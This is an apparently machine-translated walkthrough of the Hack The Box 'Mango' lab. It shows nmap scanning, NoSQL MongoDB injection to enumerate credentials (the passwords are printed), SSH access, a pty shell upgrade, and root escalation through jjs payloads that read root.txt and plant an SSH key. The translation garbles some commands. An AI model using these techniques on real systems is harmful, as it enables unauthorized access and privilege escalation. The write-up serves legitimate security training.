Shulou(Shulou.com)06/01 Report--

This article mainly explains the "penetration test example of HTB Mango". The content of the explanation is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn the penetration test example of HTB Mango.

Preface

This drill uses the kali system to operate in accordance with the process of penetration testing. Useful information can not be obtained through previous information collection and ordinary injection. Google princes know that you can use Nosql-MongoDB-injection to crawl accounts and passwords, use ssh remote connection to obtain user.txt and finally obtain root.txt by lifting rights.

1. Information collection 1. Target ip

The ip address is 10.129.1.219

2. Target machine port and service nmap-sV-A-O 10.129.1.219

Get the open port and version information and get the domain name information that is in use

PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu)) 3, website information collection

View ports 80 and 443

It is found that port 443 is a search interface similar to Google to get some information through certificates.

Second, vulnerability detection and utilization of Nosql-MongoDB-injection

Focus on port 80, which is a login interface that attempts to crawl useful information through normal sql injection

Google found that Nosql-MongoDB-injection can use scripts to try to get account numbers and passwords.

Link: https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

Python3 nosqli-user-pass-enum.py-u http://staging-order.mango.htb/-up username-pp password-ep username-op login:login,submit:submitpython3 nosqli-user-pass-enum.py-u http://staging-order.mango.htb/-up username-pp password-ep password-op login:login,submit:submit

User: admin password: t9KcS3 >! 0B#2

User: mango password: h4mXK8RhU~f {] f5H

Log in using the obtained account password

No matter which one you use, you will jump to this interface.

Connect remotely through ssh and jump to the admin user, otherwise you cannot view the user.txt under the admin folder

III. Promotion of rights

Get interactive shell

Python-c 'import pty;pty.spawn ("/ bin/bash")'

Use LinEnum.sh to see if there is available information

Finally, according to the prompt, I found that jjs can use jjs to raise rights.

Use GTFOBins to view available scripts

Link: https://gtfobins.github.io/

(1) obtain root.txt directly by running the file read command

Var BufferedReader = Java.type ("java.io.BufferedReader"); var FileReader = Java.type ("java.io.FileReader"); var br = new BufferedReader (new FileReader ("/ root/root.txt")); while ((line = br.readLine ())! = null) {print (line);}

(2) upload the ssh public key generated by ourselves through jjs and then use our own private key to connect to obtain root permission.

Ssh-keygen

Improve script information

Echo 'var FileWriter = Java.type ("java.io.FileWriter"); var fw=new FileWriter (". / file_to_write"); fw.write ("DATA"); fw.close ();' | jjs

Execute the script in the acquired shell and finally log in in kali to get the root permission

Thank you for your reading, the above is the content of "the penetration test example of HTB Mango". After the study of this article, I believe you have a deeper understanding of the penetration test example of HTB Mango, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.